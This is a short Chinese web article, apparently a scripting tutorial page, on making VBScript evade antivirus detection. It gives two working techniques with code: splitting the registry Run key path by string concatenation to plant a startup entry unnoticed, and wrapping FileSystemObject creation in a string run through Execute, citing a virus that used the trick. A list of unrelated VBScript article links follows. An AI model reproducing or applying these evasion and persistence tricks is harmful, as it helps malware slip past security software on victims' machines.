殺毒的對(duì)vbs相當(dāng)敏感 免殺
現(xiàn)在殺毒的對(duì)vbs相當(dāng)敏感,只要發(fā)現(xiàn)對(duì)注冊(cè)表的xx作,或使用vbs運(yùn)行命令(加用戶) 就可能被殺。下面談2方法可以簡(jiǎn)單解決:
1.使用連接符"&" 如:
Set CURObj = CreateObject("Wscript.Shell")
mhk="HK"&"LM\SOFT"&"WARE\Micr"&"osoft\Win"&"dows\Curren"&"tVersion\Run\"
CURObj.RegWrite ""&mhk&"internat.exe","internat.exe"
2.使用Execute函數(shù)(BY 動(dòng)鯊 )
一些殺毒軟件,如瑞星,他門會(huì)監(jiān)視網(wǎng)頁(yè)中的代碼,一旦你創(chuàng)建了FSO或?qū)懽?cè)表,即使是正常的腳本他也會(huì)報(bào)告危險(xiǎn),但是當(dāng)年新歡樂時(shí)光也用了FSO怎么就沒報(bào)警呢?原因是這個(gè)病毒使用Execute這個(gè)函數(shù)來躲過了防火墻,呵呵。病毒將這段聲明代碼轉(zhuǎn)化為字符串,然后通過Execute(String)函數(shù)執(zhí)行,舉個(gè)例子
str="set fso=CreateObject( " & chr(34) & "scrip" & chr(116)& "ing.FileSystemObject"&chr(34)&")"
msgbox str
Execute str
將如上的代碼放入test.vbs中就會(huì)被創(chuàng)建FSO,而瑞星就不會(huì)報(bào)警
相關(guān)文章
HTA文件去除html控件認(rèn)證和接收命令行參數(shù)
最近看vbscript程序員參考手冊(cè)第三版,講到hta的兩個(gè)應(yīng)用2009-07-07
dim函數(shù)第三個(gè)參數(shù)設(shè)置截取字符的長(zhǎng)度問題
dim函數(shù)的第三個(gè)參數(shù),也就是截取字符的長(zhǎng)度,我在設(shè)置這個(gè)的時(shí)候,出了些問題,提示無效的過程調(diào)用或參數(shù),本文詳細(xì)介紹如何解決2012-12-12
iisweb.vbs iis網(wǎng)站管理腳本使用介紹
可以使用命令行腳本 iisweb.vbs(存儲(chǔ)在 systemroot\System32 中)在運(yùn)行帶有 IIS 6.0 的 Windows Server 2003 家族成員的本地或遠(yuǎn)程計(jì)算機(jī)上創(chuàng)建網(wǎng)站配置。該命令不創(chuàng)建或破壞內(nèi)容,而只是設(shè)置目錄結(jié)構(gòu)和某些 IIS 配置文件2014-07-07
VBS ArrayList Class vbs中的數(shù)組類
VBS ArrayList Class vbs中的數(shù)組類...2007-03-03
用vbs確定計(jì)算機(jī)是否有 USB 2.0 端口的代碼
用vbs確定計(jì)算機(jī)是否有 USB 2.0 端口的代碼...2007-03-03
VBS基礎(chǔ)篇 - vbscript動(dòng)態(tài)數(shù)組
VBS中的動(dòng)態(tài)數(shù)組需要使用System.Collections.ArrayList,需要的朋友可以參考下2018-05-05
用vbs實(shí)現(xiàn)配置靜態(tài) IP 地址
用vbs實(shí)現(xiàn)配置靜態(tài) IP 地址...2007-05-05

